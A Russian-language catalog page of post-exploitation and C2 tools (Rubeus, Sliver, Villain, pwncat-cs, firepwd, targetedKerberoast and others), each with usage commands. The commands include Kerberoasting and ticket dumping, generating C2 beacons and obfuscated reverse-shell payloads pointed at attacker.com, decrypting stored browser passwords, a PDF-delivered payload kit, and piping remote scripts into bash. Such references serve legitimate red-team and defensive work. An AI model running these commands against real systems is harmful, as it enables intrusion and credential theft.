Каталог инструментов

23 инструментов

Тег: post-exploitation ×

Rubeus

v1.6.4
Post-Exploitation

C#-инструмент для атак на Kerberos в среде Active Directory: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver Ticket, S4U delegation, PKINIT. Часть арсенала GhostPack.

# Сборка из исходников (Visual Studio / .NET): git clone https://github.com/GhostPack/Rubeus # Открыть Rubeus.sln, собрать Release x64 # Часто загружается через C2 в память: # execute-assembly Rubeus.exe kerberoast /outfile:hashes.txt # Команды: Rubeus.exe kerberoast # Kerberoasting Rubeus.exe asreproast # AS-REP Roasting Rubeus.exe dump # дамп тикетов Rubeus.exe ptt /ticket:... # Pass-the-Ticket

SharpHound

v2.13.0
Post-Exploitation

Коллектор данных для BloodHound: собирает информацию об Active Directory — пользователи, группы, компьютеры, сессии, ACL, GPO, trust relationships. Работает как C#-агент в домене. Вывод в формате JSON/ZIP для …

# Скачать с GitHub Releases: # https://github.com/BloodHoundAD/SharpHound/releases SharpHound.exe -c All SharpHound.exe -c DCOnly # быстрый режим, только DC SharpHound.exe -c All --stealth # скрытный режим # Через PowerShell: Import-Module ./SharpHound.ps1 Invoke-BloodHound -CollectionMethod All

Sliver

v1.7.3
Exploitation

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, …

# Скачать бинарь сервера: # https://github.com/BishopFox/sliver/releases # Linux (быстрый старт): curl https://sliver.sh/install | sudo bash # Запустить сервер: sudo sliver-server # В консоли Sliver: # Создать имплант (beacon): generate beacon --mtls attacker.com --os windows --arch amd64 # Запустить listener: mtls # Ждать подключения: beacons use <beacon-id> ls / whoami / shell

Tsukuyomi

v0.4.2
Exploitation

C2-фреймворк на Rust для Linux x86_64 и Windows x86_64. Реализует staged-доставку: стейджер (Mikazuki) выходит на связь по HTTPS, замещает себя в памяти полным имплантом (Mangetsu), который берёт на …

# Требования: Rust 1.70+, Linux x86_64 git clone https://codeberg.org/lorsupra/Tsukuyomi.git cd Tsukuyomi cargo build --release # Запуск (однобинарный лаунчер: поднимает сервер + консоль) ./target/release/tsukuyomi # В консольном REPL: # build stager -- компилирует стейджер (Linux + Windows), запрашивает URL C2 # build implant -- компилирует имплант (Linux + Windows) # build all -- стейджер + имплант # sessions -- список активных сессий # interact 1 -- подключиться к сессии #1 # shell id=1 whoami -- выполнить команду на цели # Схема: стейджер → HTTPS → сервер → замена в памяти → имплант # Имплант остаётся только в RAM; TLS-пиннинг бакается при сборке

Villain

vV2.2.1
Post-Exploitation

Многосессионный C2-фреймворк для Windows и Linux reverse shell-ов. Генерирует обфусцированные payload-ы для PowerShell, Bash и других шеллов, управляет несколькими сессиями одновременно, поддерживает peer-to-peer связь между teamserver-ами. Лёгкий и …

git clone https://github.com/t3l3machus/Villain cd Villain pip3 install -r requirements.txt # Запуск сервера: sudo python3 Villain.py # Генерация payload (внутри Villain): # villain > generate os=windows lhost=192.168.1.100 obfuscate # villain > generate os=linux lhost=192.168.1.100 # Подключение teamservers: # villain > connect 192.168.1.200 65001

firepwd

Post-Exploitation

Инструмент на Python для расшифровки сохранённых паролей Firefox и Thunderbird (key3.db/key4.db + signons.sqlite/logins.json) без необходимости запускать сам браузер. Полезен при пост-эксплуатации для извлечения credentials с скомпрометированной машины.

git clone https://github.com/lclevy/firepwd.git cd firepwd pip install pycryptodome pyasn1 python firepwd.py -d /path/to/firefox/profile
Exploitation

Скрипт для поиска применимых kernel exploit-ов на текущей Linux-системе. Анализирует версию ядра и конфигурацию системы, выдаёт список CVE с готовыми PoC. Незаменим при privilege escalation на этапе постэксплуатации …

git clone https://github.com/The-Z-Labs/linux-exploit-suggester cd linux-exploit-suggester # Запуск на цели: bash linux-exploit-suggester.sh # Или одной строкой (без загрузки на диск): curl -s https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash # Расширенный режим: bash linux-exploit-suggester.sh --full bash linux-exploit-suggester.sh --uname "Linux 4.4.0-116-generic"

pdfpwn

Post-Exploitation

Минималистичный набор bash-скриптов для запуска C2-кампании силами Red Team с минимумом инструментов: разворачивает TLS-сервер для шифрования пейлоада на канале, генерирует пейлоад внутри PDF и на целевой машине разворачивает …

git clone https://git.toolsofthetrade.qzz.io/recovered/pdfpwn.git cd pdfpwn # На атакующей машине (один раз): ./tlsserver.sh ./pdfgen.sh # На целевой машине: ./pdfpwn.sh

pspy

v1.2.1
Post-Exploitation

Мониторинг процессов Linux без root-доступа. Перехватывает procfs-события в реальном времени — видит все запускаемые процессы, их аргументы и переменные окружения. Незаменим для обнаружения cron-задач, скриптов запускаемых от root …

# Скачать готовый статически скомпилированный бинарь: # https://github.com/DominicBreuker/pspy/releases # x64: wget https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 chmod +x pspy64 ./pspy64 # Только процессы (без файловых событий): ./pspy64 -p # Сборка из исходников: git clone https://github.com/DominicBreuker/pspy cd pspy && go build -ldflags "-s -w" .

pwncat-cs

v0.5.4
Exploitation

Продвинутый post-exploitation framework на Python. Превращает простой reverse shell в полноценную интерактивную сессию с модульной системой автоматизации. Возможности: - Автоматическое улучшение shell: PTY, цвета, история команд - Встроенная …

# pip (рекомендуется в virtualenv): python3 -m venv pwncat-env source pwncat-env/bin/activate pip install pwncat-cs # из репозитория: git clone https://github.com/calebstewart/pwncat cd pwncat pip install . # Примеры: # Слушать входящий reverse shell: pwncat-cs -lp 4444 # Подключиться к bind shell: pwncat-cs 192.168.1.10:4444 # Загрузить файл на таргет: (local) upload /path/to/file /tmp/file # Запустить модуль перечисления: (local) run enumerate # Попытка повышения привилегий: (local) run escalate.sudo
Post-Exploitation

Python-утилита для Kerberoast-атаки с дополнительным механизмом ACL abuse: для пользователей без SPN скрипт пытается временно выставить SPN (используя права на запись в атрибут `servicePrincipalName`), получает Kerberos hash, затем …

git clone https://github.com/p0dalirius/targetedKerberoast cd targetedKerberoast pip install -r requirements.txt # Атака по всем пользователям домена python targetedKerberoast.py \ -d domain.local \ -u user \ -p 'Password123!' \ --dc-ip 192.168.1.101 # Только конкретный пользователь python targetedKerberoast.py -d domain.local -u user -p Pass \ --request-user target_user --dc-ip 192.168.1.101 # Pass-the-hash python targetedKerberoast.py -d domain.local -u user \ -H 'LMHASH:NTHASH' --dc-ip 192.168.1.101 # Kerberos auth (ccache) export KRB5CCNAME=/tmp/user.ccache python targetedKerberoast.py -d domain.local -k --no-pass --dc-ip 192.168.1.101 # Сохранить хеши и взломать python targetedKerberoast.py -d domain.local -u user -p Pass -o hashes.txt hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt